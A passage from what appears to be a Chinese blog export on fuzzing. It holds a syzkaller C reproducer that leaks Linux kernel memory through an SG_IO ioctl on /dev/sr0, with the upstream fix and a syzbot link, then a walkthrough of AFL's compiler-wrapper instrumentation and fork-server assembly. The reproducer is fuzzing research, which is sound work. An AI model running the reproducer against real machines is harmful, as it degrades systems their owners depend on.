== -1) return false; if (write(fd, buf, len) != len) &#123; int err = errno; close(fd); errno = err; return false; &#125; close(fd); return true;&#125;static void kill_and_wait(int pid, int* status)&#123; kill(-pid, SIGKILL); kill(pid, SIGKILL); for (int i = 0; i &lt; 100; i++) &#123; if (waitpid(-1, status, WNOHANG | __WALL) == pid) return; usleep(1000); &#125; DIR* dir = opendir(&quot;/sys/fs/fuse/connections&quot;); if (dir) &#123; for (;;) &#123; struct dirent* ent = readdir(dir); if (!ent) break; if (strcmp(ent-&gt;d_name, &quot;.&quot;) == 0 || strcmp(ent-&gt;d_name, &quot;..&quot;) == 0) continue; char abort[300]; snprintf(abort, sizeof(abort), &quot;/sys/fs/fuse/connections/%s/abort&quot;, ent-&gt;d_name); int fd = open(abort, O_WRONLY); if (fd == -1) &#123; continue; &#125; if (write(fd, abort, 1) &lt; 0) &#123; &#125; close(fd); &#125; closedir(dir); &#125; else &#123; &#125; while (waitpid(-1, status, __WALL) != pid) &#123; &#125;&#125;static void setup_test()&#123; prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0); setpgrp(); write_file(&quot;/proc/self/oom_score_adj&quot;, &quot;1000&quot;);&#125;#define KMEMLEAK_FILE &quot;/sys/kernel/debug/kmemleak&quot;static void setup_leak()&#123; if (!write_file(KMEMLEAK_FILE, &quot;scan&quot;)) exit(1); sleep(5); if (!write_file(KMEMLEAK_FILE, &quot;scan&quot;)) exit(1); if (!write_file(KMEMLEAK_FILE, &quot;clear&quot;)) exit(1);&#125;static void check_leaks(void)&#123; int fd = open(KMEMLEAK_FILE, O_RDWR); if (fd == -1) exit(1); uint64_t start = current_time_ms(); if (write(fd, &quot;scan&quot;, 4) != 4) exit(1); sleep(1); while (current_time_ms() - start &lt; 4 * 1000) sleep(1); if (write(fd, &quot;scan&quot;, 4) != 4) exit(1); static char buf[128 &lt;&lt; 10]; ssize_t n = read(fd, buf, sizeof(buf) - 1); if (n &lt; 0) exit(1); int nleaks = 0; if (n != 0) &#123; sleep(1); if (write(fd, &quot;scan&quot;, 4) != 4) exit(1); if (lseek(fd, 0, SEEK_SET) &lt; 0) exit(1); n = read(fd, buf, sizeof(buf) - 1); if (n &lt; 0) exit(1); buf[n] = 0; char* pos = buf; char* end = buf + n; while (pos &lt; end) &#123; char* next = strstr(pos + 1, &quot;unreferenced object&quot;); if (!next) next = end; char prev = *next; *next = 0; fprintf(stderr, &quot;BUG: memory leak\\n%s\\n&quot;, pos); *next = prev; pos = next; nleaks++; &#125; &#125; if (write(fd, &quot;clear&quot;, 5) != 5) exit(1); close(fd); if (nleaks) exit(1);&#125;static void execute_one(void);#define WAIT_FLAGS __WALLstatic void loop(void)&#123; int iter = 0; for (;; iter++) &#123; int pid = fork(); if (pid &lt; 0) exit(1); if (pid == 0) &#123; setup_test(); execute_one(); exit(0); &#125; int status = 0; uint64_t start = current_time_ms(); for (;;) &#123; if (waitpid(-1, &amp;status, WNOHANG | WAIT_FLAGS) == pid) break; sleep_ms(1); if (current_time_ms() - start &lt; 5000) continue; kill_and_wait(pid, &amp;status); break; &#125; check_leaks(); &#125;&#125;uint64_t r[1] = &#123;0xffffffffffffffff&#125;;void execute_one(void)&#123; intptr_t res = 0;memcpy((void*)0x20000200, &quot;/dev/sr0\\000&quot;, 9); res = syscall(__NR_openat, /*fd=*/0xffffffffffffff9cul, /*file=*/0x20000200ul, /*flags=*/0x1a9802ul, /*mode=*/0ul); if (res != -1) r[0] = res;*(uint32_t*)0x20000740 = 0x53;*(uint32_t*)0x20000744 = 0xfffffffe;*(uint8_t*)0x20000748 = 0xa;*(uint8_t*)0x20000749 = 0;*(uint16_t*)0x2000074a = 0;*(uint32_t*)0x2000074c = 0x20000;*(uint64_t*)0x20000750 = 0;*(uint64_t*)0x20000758 = 0x200005c0;memcpy((void*)0x200005c0, &quot;\\xf6\\xc7\\x8b\\x31\\x9f\\x83\\x19\\xde\\xb1\\x3d&quot;, 10);*(uint64_t*)0x20000760 = 0x20000600;*(uint32_t*)0x20000768 = 0;*(uint32_t*)0x2000076c = 0;*(uint32_t*)0x20000770 = 0;*(uint64_t*)0x20000774 = 0;*(uint8_t*)0x2000077c = 0;*(uint8_t*)0x2000077d = 0;*(uint8_t*)0x2000077e = 0;*(uint8_t*)0x2000077f = 0;*(uint16_t*)0x20000780 = 0;*(uint16_t*)0x20000782 = 0;*(uint32_t*)0x20000784 = 0;*(uint32_t*)0x20000788 = 0;*(uint32_t*)0x2000078c = 0; syscall(__NR_ioctl, /*fd=*/r[0], /*cmd=*/0x2285, /*arg=*/0x20000740ul);&#125;int main(void)&#123; syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul, /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul); setup_leak(); loop(); return 0;&#125; 由于没有对syzkaller自定义syzlang，因此此漏洞大概率能被syzbot（一个基于syzkaller的内核自动测试bot）发现： 通过搜索，果然找到了2023-08-17的相关讨论：https://lore.kernel.org/all/000000000000e32603060314b623@google.com/T/ 12345678910111213141516diff --git a/lib/iov_iter.c b/lib/iov_iter.cindex 27234a820eeb..c3fd0448dead 100644--- a/lib/iov_iter.c+++ b/lib/iov_iter.c@@ -1780,8 +1780,10 @@ static ssize_t iov_iter_extract_user_pages(struct iov_iter *i, if (!maxpages) return -ENOMEM; res = pin_user_pages_fast(addr, maxpages, gup_flags, *pages);- if (unlikely(res &lt;= 0))+ if (unlikely(res &lt;= 0)) &#123;+ kvfree(*pages); return res;+ &#125; maxsize = min_t(size_t, maxsize, res * PAGE_SIZE - offset); iov_iter_advance(i, maxsize); return maxsize; 查看修复patch，符合之前发现的漏洞情形","categories":[{"name":"Fuzz","slug":"Fuzz","permalink":"https://v3rdant.cn/categories/Fuzz/"}],"tags":[{"name":"Kernel","slug":"Kernel","permalink":"https://v3rdant.cn/tags/Kernel/"},{"name":"Fuzz","slug":"Fuzz","permalink":"https://v3rdant.cn/tags/Fuzz/"}]},{"title":"Fuzz.AFL-All-in-One","slug":"Fuzz.AFL-All-in-One","date":"2024-01-12T13:52:38.000Z","updated":"2024-03-04T07:47:22.258Z","comments":true,"path":"Fuzz.AFL-All-in-One/","link":"","permalink":"https://v3rdant.cn/Fuzz.AFL-All-in-One/","excerpt":"","text":"overview 对于AFL代码的重新阅读，笔者之前曾经阅读过一次AFL代码，但是比较粗糙，所以决定重新阅读一遍，理解其中比较细节的部分。 首先简单介绍一下AFL，AFL是一个覆盖率引导的fuzz 工具。 它将一个无跳转的顺序执行流程看成一个基本块，并通过一个bitmap记录运行时每一个输入对应的标准块。 通过基本块的覆盖率引导对于输入种子的变异，从而不断变换输入，进行测试，来挖掘漏洞。 afl-gcc/afl-as | 代码插桩 afl的核心思想是覆盖率引导，为了能够得到运行时代码覆盖率，AFL需要在编译时对产生的汇编代码进行插桩，在每个基本块前插入的桩代码能够写入对应bitmap，记录运行时当前覆盖率 这是通过对gcc和as的封装实现的，也即通过封装编译器以及汇编器，来实现编译时插桩。 afl-gcc 的核心逻辑很简单 只是对于gcc，做了一些参数处理的封装，让gcc启用一些配合fuzz的编译参数，并且使用封装好的afl-as作为汇编器 12345678910111213141516171819202122232425262728293031323334353637383940int main(int argc, char **argv)&#123; if (isatty(2) &amp;&amp; !getenv(&quot;AFL_QUIET&quot;)) &#123; SAYF(cCYA &quot;afl-cc &quot; cBRI VERSION cRST &quot; by &lt;lcamtuf@google.com&gt;\\n&quot;); &#125; else be_quiet = 1; if (argc &lt; 2) &#123; SAYF(&quot;\\n&quot; &quot;This is a helper application for afl-fuzz. It serves as a drop-in replacement\\n&quot; &quot;for gcc or clang, letting you recompile third-party code with the required\\n&quot; &quot;runtime instrumentation. A common use pattern would be one of the following:\\n\\n&quot; &quot; CC=%s/afl-gcc ./configure\\n&quot; &quot; CXX=%s/afl-g++ ./configure\\n\\n&quot; &quot;You can specify custom next-stage toolchain via AFL_CC, AFL_CXX, and AFL_AS.\\n&quot; &quot;Setting AFL_HARDEN enables hardening optimizations in the compiled code.\\n\\n&quot;, BIN_PATH, BIN_PATH); exit(1); &#125; find_as(argv[0]); // 首先找到封装的afl-as edit_params(argc, argv); // 然后对于参数进行处理传给真正的编译器 execvp(cc_params[0], (char **)cc_params); // 然后运行编译器 FATAL(&quot;Oops, failed to execute &#x27;%s&#x27; - check your PATH&quot;, cc_params[0]); return 0;&#125; 然后是afl-as，他是as的封装，插桩就是在此完成的, 这里主要关注插装的实现 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677int main(int argc, char** argv) &#123; s32 pid; u32 rand_seed; int status; u8* inst_ratio_str = getenv(&quot;AFL_INST_RATIO&quot;); struct timeval tv; struct timezone tz; clang_mode = !!getenv(CLANG_ENV_VAR); if (isatty(2) &amp;&amp; !getenv(&quot;AFL_QUIET&quot;)) &#123; SAYF(cCYA &quot;afl-as &quot; cBRI VERSION cRST &quot; by &lt;lcamtuf@google.com&gt;\\n&quot;); &#125; else be_quiet = 1; if (argc &lt; 2) &#123; SAYF(&quot;\\n&quot; &quot;This is a helper application for afl-fuzz. It is a wrapper around GNU &#x27;as&#x27;,\\n&quot; &quot;executed by the toolchain whenever using afl-gcc or afl-clang. You probably\\n&quot; &quot;don&#x27;t want to run this program directly.\\n\\n&quot; &quot;Rarely, when dealing with extremely complex projects, it may be advisable to\\n&quot; &quot;set AFL_INST_RATIO to a value less than 100 in order to reduce the odds of\\n&quot; &quot;instrumenting every discovered branch.\\n\\n&quot;); exit(1); &#125; gettimeofday(&amp;tv, &amp;tz); rand_seed = tv.tv_sec ^ tv.tv_usec ^ getpid(); srandom(rand_seed); edit_params(argc, argv); if (inst_ratio_str) &#123; if (sscanf(inst_ratio_str, &quot;%u&quot;, &amp;inst_ratio) != 1 || inst_ratio &gt; 100) FATAL(&quot;Bad value of AFL_INST_RATIO (must be between 0 and 100)&quot;); &#125; if (getenv(AS_LOOP_ENV_VAR)) FATAL(&quot;Endless loop when calling &#x27;as&#x27; (remove &#x27;.&#x27; from your PATH)&quot;); setenv(AS_LOOP_ENV_VAR, &quot;1&quot;, 1); /* When compiling with ASAN, we don&#x27;t have a particularly elegant way to skip ASAN-specific branches. But we can probabilistically compensate for that... */ if (getenv(&quot;AFL_USE_ASAN&quot;) || getenv(&quot;AFL_USE_MSAN&quot;)) &#123; sanitizer = 1; inst_ratio /= 3; &#125; if (!just_version) add_instrumentation(); if (!(pid = fork())) &#123; execvp(as_params[0], (char**)as_params); FATAL(&quot;Oops, failed to execute &#x27;%s&#x27; - check your PATH&quot;, as_params[0]); &#125; if (pid &lt; 0) PFATAL(&quot;fork() failed&quot;); if (waitpid(pid, &amp;status, 0) &lt;= 0) PFATAL(&quot;waitpid() failed&quot;); if (!getenv(&quot;AFL_KEEP_ASSEMBLY&quot;)) unlink(modified_file); exit(WEXITSTATUS(status));&#125; 插装的核心在于调用的 add_instrumentation 函数 add_instrumentation add_instrumentation 就是实际用来插桩的函数。 此函数首先打开input文件和output文件 1234567891011121314151617181920212223242526272829303132static void add_instrumentation(void) &#123; static u8 line[MAX_LINE]; FILE* inf; FILE* outf; s32 outfd; u32 ins_lines = 0; u8 instr_ok = 0, skip_csect = 0, skip_next_label = 0, skip_intel = 0, skip_app = 0, instrument_next = 0;#ifdef __APPLE__ u8* colon_pos;#endif /* __APPLE__ */ if (input_file) &#123; inf = fopen(input_file, &quot;r&quot;); if (!inf) PFATAL(&quot;Unable to read &#x27;%s&#x27;&quot;, input_file); &#125; else inf = stdin; outfd = open(modified_file, O_WRONLY | O_EXCL | O_CREAT, 0600); if (outfd &lt; 0) PFATAL(&quot;Unable to write to &#x27;%s&#x27;&quot;, modified_file); outf = fdopen(outfd, &quot;w&quot;); if (!outf) PFATAL(&quot;fdopen() failed&quot;); 然后开始循环遍历input文件 1 while (fgets(line, MAX_LINE, inf)) &#123; 在特定位置插桩代码，这里的几个flag的值将在后面解释，简单来说，就是用来找到需要插桩的基本块的开头。这几个flag就是用来识别当前是否是基本块的开头。如果是是，就需要进行插桩 12345678910if (!pass_thru &amp;&amp; !skip_intel &amp;&amp; !skip_app &amp;&amp; !skip_csect &amp;&amp; instr_ok &amp;&amp; instrument_next &amp;&amp; line[0] == &#x27;\\t&#x27; &amp;&amp; isalpha(line[1])) &#123; fprintf(outf, use_64bit ? trampoline_fmt_64 : trampoline_fmt_32, R(MAP_SIZE)); instrument_next = 0; ins_lines++;&#125; 无论是否进行了插桩，最后都要将原行写入输出文件 1fputs(line, outf); 由于一般只在text段插桩，所以要在找到此段，并且用 instr_ok 来标识 1234567891011121314151617181920212223242526272829303132if (pass_thru) continue;/* All right, this is where the actual fun begins. For one, we only want to instrument the .text section. So, let&#x27;s keep track of that in processed files - and let&#x27;s set instr_ok accordingly. */if (line[0] == &#x27;\\t&#x27; &amp;&amp; line[1] == &#x27;.&#x27;) &#123; /* OpenBSD puts jump tables directly inline with the code, which is a bit annoying. They use a specific format of p2align directives around them, so we use that as a signal. */ if (!clang_mode &amp;&amp; instr_ok &amp;&amp; !strncmp(line + 2, &quot;p2align &quot;, 8) &amp;&amp; isdigit(line[10]) &amp;&amp; line[11] == &#x27;\\n&#x27;) skip_next_label = 1; if (!strncmp(line + 2, &quot;text\\n&quot;, 5) || !strncmp(line + 2, &quot;section\\t.text&quot;, 13) || !strncmp(line + 2, &quot;section\\t__TEXT,__text&quot;, 21) || !strncmp(line + 2, &quot;section __TEXT,__text&quot;, 21)) &#123; instr_ok = 1; continue; &#125; if (!strncmp(line + 2, &quot;section\\t&quot;, 8) || !strncmp(line + 2, &quot;section &quot;, 8) || !strncmp(line + 2, &quot;bss\\n&quot;, 4) || !strncmp(line + 2, &quot;data\\n&quot;, 5)) &#123; instr_ok = 0; continue; &#125;&#125; skip_csect 用来跳过无用段，比如64位程序中的.code32段 123456if (strstr(line, &quot;.code&quot;)) &#123; if (strstr(line, &quot;.code32&quot;)) skip_csect = use_64bit; if (strstr(line, &quot;.code64&quot;)) skip_csect = !use_64bit;&#125; 跳过intel 风格的汇编 12if (strstr(line, &quot;.intel_syntax&quot;)) skip_intel = 1;if (strstr(line, &quot;.att_syntax&quot;)) skip_intel = 0; 跳过 ad-hoc __asm__ 字段 123456if (line[0] == &#x27;#&#x27; || line[1] == &#x27;#&#x27;) &#123; if (strstr(line, &quot;#APP&quot;)) skip_app = 1; if (strstr(line, &quot;#NO_APP&quot;)) skip_app = 0;&#125; 然后，对于条件跳转，可以直接区分出基本块，所以可以直接插桩 12345678910111213if (line[0] == &#x27;\\t&#x27;) &#123; if (line[1] == &#x27;j&#x27; &amp;&amp; line[2] != &#x27;m&#x27; &amp;&amp; R(100) &lt; inst_ratio) &#123; fprintf(outf, use_64bit ? trampoline_fmt_64 : trampoline_fmt_32, R(MAP_SIZE)); ins_lines++; &#125; continue;&#125; 识别跳转标签来插桩，并且针对不同平台进行处理 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162#ifdef __APPLE__ /* Apple: L&lt;whatever&gt;&lt;digit&gt;: */ if ((colon_pos = strstr(line, &quot;:&quot;))) &#123; if (line[0] == &#x27;L&#x27; &amp;&amp; isdigit(*(colon_pos - 1))) &#123;#else /* Everybody else: .L&lt;whatever&gt;: */ if (strstr(line, &quot;:&quot;)) &#123; if (line[0] == &#x27;.&#x27;) &#123;#endif /* __APPLE__ */ /* .L0: or LBB0_0: style jump destination */#ifdef __APPLE__ /* Apple: L&lt;num&gt; / LBB&lt;num&gt; */ if ((isdigit(line[1]) || (clang_mode &amp;&amp; !strncmp(line, &quot;LBB&quot;, 3))) &amp;&amp; R(100) &lt; inst_ratio) &#123;#else /* Apple: .L&lt;num&gt; / .LBB&lt;num&gt; */ if ((isdigit(line[2]) || (clang_mode &amp;&amp; !strncmp(line + 1, &quot;LBB&quot;, 3))) &amp;&amp; R(100) &lt; inst_ratio) &#123;#endif /* __APPLE__ */ /* An optimization is possible here by adding the code only if the label is mentioned in the code in contexts other than call / jmp. That said, this complicates the code by requiring two-pass processing (messy with stdin), and results in a speed gain typically under 10%, because compilers are generally pretty good about not generating spurious intra-function jumps. We use deferred output chiefly to avoid disrupting .Lfunc_begin0-style exception handling calculations (a problem on MacOS X). */ if (!skip_next_label) instrument_next = 1; else skip_next_label = 0; &#125; &#125; else &#123; /* Function label (always instrumented, deferred mode). */ instrument_next = 1; &#125; &#125; &#125; 最后，如果进行了插桩，再插入main_payload 1234567891011121314151617if (ins_lines) fputs(use_64bit ? main_payload_64 : main_payload_32, outf);if (input_file) fclose(inf);fclose(outf);if (!be_quiet) &#123; if (!ins_lines) WARNF(&quot;No instrumentation targets found%s.&quot;, pass_thru ? &quot; (pass-thru mode)&quot; : &quot;&quot;); else OKF(&quot;Instrumented %u locations (%s-bit, %s mode, ratio %u%%).&quot;, ins_lines, use_64bit ? &quot;64&quot; : &quot;32&quot;, getenv(&quot;AFL_HARDEN&quot;) ? &quot;hardened&quot; : (sanitizer ? &quot;ASAN/MSAN&quot; : &quot;non-hardened&quot;), inst_ratio); &#125; 所以，综合来看，其实最终就是插入了两个部分： 在每个基本块前面插入了trampoline_fmt 在整体后面插入了main_payload trampoline_fmt_64 trampoline直译为蹦床代码，一般是在两种运行环境之间桥接的代码，比如不同语言写的代码之间的参数转换以及环境保存和恢复。 afl在插桩时，会根据架构的不同，插入两种不同的 trampoline_fmt 代码，此代码用来在每个基本块运行前，写入对应的全局的bitmap，用来标识当前进程运行时经过此基本块方便后面计算覆盖率以及发现新路径 这里的trampoline_fmt_64就是64位下的相应代码 123456789101112131415161718192021static const u8* trampoline_fmt_64 = &quot;\\n&quot; &quot;/* --- AFL TRAMPOLINE (64-BIT) --- */\\n&quot; &quot;\\n&quot; &quot;.align 4\\n&quot; &quot;\\n&quot; &quot;leaq -(128+24)(%%rsp), %%rsp\\n&quot; &quot;movq %%rdx, 0(%%rsp)\\n&quot; &quot;movq %%rcx, 8(%%rsp)\\n&quot; &quot;movq %%rax, 16(%%rsp)\\n&quot; &quot;movq $0x%08x, %%rcx\\n&quot; &quot;call __afl_maybe_log\\n&quot; &quot;movq 16(%%rsp), %%rax\\n&quot; &quot;movq 8(%%rsp), %%rcx\\n&quot; &quot;movq 0(%%rsp), %%rdx\\n&quot; &quot;leaq (128+24)(%%rsp), %%rsp\\n&quot; &quot;\\n&quot; &quot;/* --- END --- */\\n&quot; &quot;\\n&quot;; 这是一段跳转代码， 前面用于保存参数，核心在于 12&quot;movq $0x%08x, %%rcx\\n&quot;&quot;call __afl_maybe_log\\n&quot; 在上文中可以看到，这里的rcx的值是fprintf 格式化的一个随机值，用来标识代码块，笔者其实有点疑惑为什么不用一个从0开始的值，然后一个个加上去，避免重复。 12fprintf(outf, use_64bit ? trampoline_fmt_64 : trampoline_fmt_32, R(MAP_SIZE)); 核心调用的__afl_maybe_log 在 main_payload 中实现 main_payload_64 main_payload_64包含 trampoline_fmt 运行时所需要的一些函数以及全局变量，其中最核心的是 __afl_maybe_log 函数 这里整个流程大致如下(图源ScUpax0s师傅) 简单解释一下就是，在第一此运行时， __afl_area_ptr==NULL 和 __afl_alobal_area==NULL 均为true，说明此时是第一次运行到__afl_maybe_log ，此时会进入下面的分支，在完成初始化后，进程阻塞从管道中读取，直到收到afl-fuzz进程发送过来的启动命令，此时会fork一个子进程，此子进程并恢复寄存器，然后继续运行。 在之后，子进程再次进入桩代码就会直接进入 __afl_store，也就是写入当前基本块对应的bitmap用来标识运行状态 第一次运行 初始化 首先是检查共享内存是否初始化，也就是检查 __afl_area_ptr 是否为NULL 12345678&quot; seto %al\\n&quot;&quot;\\n&quot;&quot; /* Check if SHM region is already mapped. */\\n&quot;&quot;\\n&quot;&quot; movq __afl_area_ptr(%rip), %rdx\\n&quot;&quot; testq %rdx, %rdx\\n&quot;&quot; je __afl_setup\\n&quot;&quot;\\n&quot; 如果没有，初始化共享内存并将指针保存至 __afl_area_ptr 和 __afl_global_area 这里的共享内存的id 通过环境变量来传递，通过getenv获取 AFL_SHM_ENV ，然后map出共享内存，此共享内存用来保存运行时的bitmap，需要注意的是，虽然名为bitmap，但实际上此时，这里的bitmap仍然是用一byte而不是一bit来标识相应区域是否运行到的，因为此时可以通过byte位记录运行次数，并且对于每一位的访问也要比真正的bitmap快一些。 真正的bitmap要在之后，在afl-fuzz中，通过共享内存获得运行结果后，将此处对应的内存压缩成为真正的bitmap 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293 &quot;__afl_setup:\\n&quot; &quot;\\n&quot; &quot; /* Do not retry setup if we had previous failures. */\\n&quot; &quot;\\n&quot; &quot; cmpb $0, __afl_setup_failure(%rip)\\n&quot; &quot; jne __afl_return\\n&quot; &quot;\\n&quot; &quot; /* Check out if we have a global pointer on file. */\\n&quot; &quot;\\n&quot;#ifndef __APPLE__ &quot; movq __afl_global_area_ptr@GOTPCREL(%rip), %rdx\\n&quot; &quot; movq (%rdx), %rdx\\n&quot;#else &quot; movq __afl_global_area_ptr(%rip), %rdx\\n&quot;#endif /* !^__APPLE__ */ &quot; testq %rdx, %rdx\\n&quot; &quot; je __afl_setup_first\\n&quot; &quot;\\n&quot; &quot; movq %rdx, __afl_area_ptr(%rip)\\n&quot; &quot; jmp __afl_store\\n&quot; &quot;\\n&quot; &quot;__afl_setup_first:\\n&quot; &quot;\\n&quot; &quot; /* Save everything that is not yet saved and that may be touched by\\n&quot; &quot; getenv() and several other libcalls we&#x27;ll be relying on. */\\n&quot; &quot;\\n&quot; &quot; leaq -352(%rsp), %rsp\\n&quot; &quot;\\n&quot; &quot; movq %rax, 0(%rsp)\\n&quot; &quot; movq %rcx, 8(%rsp)\\n&quot; &quot; movq %rdi, 16(%rsp)\\n&quot; &quot; movq %rsi, 32(%rsp)\\n&quot; &quot; movq %r8, 40(%rsp)\\n&quot; &quot; movq %r9, 48(%rsp)\\n&quot; &quot; movq %r10, 56(%rsp)\\n&quot; &quot; movq %r11, 64(%rsp)\\n&quot; &quot;\\n&quot; &quot; movq %xmm0, 96(%rsp)\\n&quot; &quot; movq %xmm1, 112(%rsp)\\n&quot; &quot; movq %xmm2, 128(%rsp)\\n&quot; &quot; movq %xmm3, 144(%rsp)\\n&quot; &quot; movq %xmm4, 160(%rsp)\\n&quot; &quot; movq %xmm5, 176(%rsp)\\n&quot; &quot; movq %xmm6, 192(%rsp)\\n&quot; &quot; movq %xmm7, 208(%rsp)\\n&quot; &quot; movq %xmm8, 224(%rsp)\\n&quot; &quot; movq %xmm9, 240(%rsp)\\n&quot; &quot; movq %xmm10, 256(%rsp)\\n&quot; &quot; movq %xmm11, 272(%rsp)\\n&quot; &quot; movq %xmm12, 288(%rsp)\\n&quot; &quot; movq %xmm13, 304(%rsp)\\n&quot; &quot; movq %xmm14, 320(%rsp)\\n&quot; &quot; movq %xmm15, 336(%rsp)\\n&quot; &quot;\\n&quot; &quot; /* Map SHM, jumping to __afl_setup_abort if something goes wrong. */\\n&quot; &quot;\\n&quot; &quot; /* The 64-bit ABI requires 16-byte stack alignment. We&#x27;ll keep the\\n&quot; &quot; original stack ptr in the callee-saved r12. */\\n&quot; &quot;\\n&quot; &quot; pushq %r12\\n&quot; &quot; movq %rsp, %r12\\n&quot; &quot; subq $16, %rsp\\n&quot; &quot; andq $0xfffffffffffffff0, %rsp\\n&quot; &quot;\\n&quot; &quot; leaq .AFL_SHM_ENV(%rip), %rdi\\n&quot; CALL_L64(&quot;getenv&quot;) &quot;\\n&quot; &quot; testq %rax, %rax\\n&quot; &quot; je __afl_setup_abort\\n&quot; &quot;\\n&quot; &quot; movq %rax, %rdi\\n&quot; CALL_L64(&quot;atoi&quot;) &quot;\\n&quot; &quot; xorq %rdx, %rdx /* shmat flags */\\n&quot; &quot; xorq %rsi, %rsi /* requested addr */\\n&quot; &quot; movq %rax, %rdi /* SHM ID */\\n&quot; CALL_L64(&quot;shmat&quot;) &quot;\\n&quot; &quot; cmpq $-1, %rax\\n&quot; &quot; je __afl_setup_abort\\n&quot; &quot;\\n&quot; &quot; /* Store the address of the SHM region. */\\n&quot; &quot;\\n&quot; &quot; movq %rax, %rdx\\n&quot; &quot; movq %rax, __afl_area_ptr(%rip)\\n&quot; &quot;\\n&quot;#ifdef __APPLE__ &quot; movq %rax, __afl_global_area_ptr(%rip)\\n&quot;#else &quot; movq __afl_global_area_ptr@GOTPCREL(%rip), %rdx\\n&quot; &quot; movq %rax, (%rdx)\\n&quot;#endif /* ^__APPLE__ */ &quot; movq %rax, %rdx\\n&quot; 然后再通过管道通知主进程此进程已经准备好了 123456789101112131415161718192021&quot;__afl_forkserver:\\n&quot;&quot;\\n&quot;&quot; /* Enter the fork server mode to avoid the overhead of execve() calls. We\\n&quot;&quot; push rdx (area ptr) twice to keep stack alignment neat. */\\n&quot;&quot;\\n&quot;&quot; pushq %rdx\\n&quot;&quot; pushq %rdx\\n&quot;&quot;\\n&quot;&quot; /* Phone home and tell the parent that we&#x27;re OK. (Note that signals with\\n&quot;&quot; no SA_RESTART will mess it up). If this fails, assume that the fd is\\n&quot;&quot; closed because we were execve()d from an instrumented binary, or because\\n&quot;&quot; the parent doesn&#x27;t want to use the fork server. */\\n&quot;&quot;\\n&quot;&quot; movq $4, %rdx /* length */\\n&quot;&quot; leaq __afl_temp(%rip), %rsi /* data */\\n&quot;&quot; movq $&quot; STRINGIFY((FORKSRV_FD + 1)) &quot;, %rdi /* file desc */\\n&quot;CALL_L64(&quot;write&quot;)&quot;\\n&quot;&quot; cmpq $4, %rax\\n&quot;&quot; jne __afl_fork_resume\\n&quot;&quot;\\n&quot; __afl_fork_wait_loop __afl_fork_wait_loop 的作用是阻塞当前进程，直到从管道收到主进程发来的运行命令，如果收到了信号，则fork一个子进程，并调用 __afl_fork_resume 继续运行，否则继续阻塞 这里的和afl-fuzz通信用的管道的fd是相互约定好的，我们直到，此代码会插桩在需要fuzz的程序中，afl-fuzz会通过fork启动此程序，而fork是会继承文件描述符的，因此只要双方约定好一个确定的较大的文件描述符，即可相互通信 123456789101112131415161718192021222324252627282930313233343536373839404142434445&quot;__afl_fork_wait_loop:\\n&quot;&quot;\\n&quot;&quot; /* Wait for parent by reading from the pipe. Abort if read fails. */\\n&quot;&quot;\\n&quot;&quot; movq $4, %rdx /* length */\\n&quot;&quot; leaq __afl_temp(%rip), %rsi /* data */\\n&quot;&quot; movq $&quot; STRINGIFY(FORKSRV_FD) &quot;, %rdi /* file desc */\\n&quot;CALL_L64(&quot;read&quot;)&quot; cmpq $4, %rax\\n&quot;&quot; jne __afl_die\\n&quot;&quot;\\n&quot;&quot; /* Once woken up, create a clone of our process. This is an excellent use\\n&quot;&quot; case for syscall(__NR_clone, 0, CLONE_PARENT), but glibc boneheadedly\\n&quot;&quot; caches getpid() results and offers no way to update the value, breaking\\n&quot;&quot; abort(), raise(), and a bunch of other things :-( */\\n&quot;&quot;\\n&quot;CALL_L64(&quot;fork&quot;)&quot; cmpq $0, %rax\\n&quot;&quot; jl __afl_die\\n&quot;&quot; je __afl_fork_resume\\n&quot;&quot;\\n&quot;&quot; /* In parent process: write PID to pipe, then wait for child. */\\n&quot;&quot;\\n&quot;&quot; movl %eax, __afl_fork_pid(%rip)\\n&quot;&quot;\\n&quot;&quot; movq $4, %rdx /* length */\\n&quot;&quot; leaq __afl_fork_pid(%rip), %rsi /* data */\\n&quot;&quot; movq $&quot; STRINGIFY((FORKSRV_FD + 1)) &quot;, %rdi /* file desc */\\n&quot;CALL_L64(&quot;write&quot;)&quot;\\n&quot;&quot; movq $0, %rdx /* no flags */\\n&quot;&quot; leaq __afl_temp(%rip), %rsi /* status */\\n&quot;&quot; movq __afl_fork_pid(%rip), %rdi /* PID */\\n&quot;CALL_L64(&quot;waitpid&quot;)&quot; cmpq $0, %rax\\n&quot;&quot; jle __afl_die\\n&quot;&quot;\\n&quot;&quot; /* Relay wait status to pipe, then loop back. */\\n&quot;&quot;\\n&quot;&quot; movq $4, %rdx /* length */\\n&quot;&quot; leaq __afl_temp(%rip), %rsi /* data */\\n&quot;&quot; movq $&quot; STRINGIFY((FORKSRV_FD + 1)) &quot;, %rdi /* file desc */\\n&quot;CALL_L64(&quot;write&quot;)&quot;\\n&quot;&quot; jmp __afl_fork_wait_loop\\n&quot; __afl_fork_resume 用于恢复运行 实际上就是恢复了在栈中的寄存器 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950&quot;__afl_fork_resume:\\n&quot;&quot;\\n&quot;&quot; /* In child process: close fds, resume execution. */\\n&quot;&quot;\\n&quot;&quot; movq $&quot; STRINGIFY(FORKSRV_FD) &quot;, %rdi\\n&quot;CALL_L64(&quot;close&quot;)&quot;\\n&quot;&quot; movq $&quot; STRINGIFY((FORKSRV_FD + 1)) &quot;, %rdi\\n&quot;CALL_L64(&quot;close&quot;)&quot;\\n&quot;&quot; popq %rdx\\n&quot;&quot; popq %rdx\\n&quot;&quot;\\n&quot;&quot; movq %r12, %rsp\\n&quot;&quot; popq %r12\\n&quot;&quot;\\n&quot;&quot; movq 0(%rsp), %rax\\n&quot;&quot; movq 8(%rsp), %rcx\\n&quot;&quot; movq 16(%rsp), %rdi\\n&quot;&quot; movq 32(%rsp), %rsi\\n&quot;&quot; movq 40(%rsp), %r8\\n&quot;&quot; movq 48(%rsp), %r9\\n&quot;&quot; movq 56(%rsp), 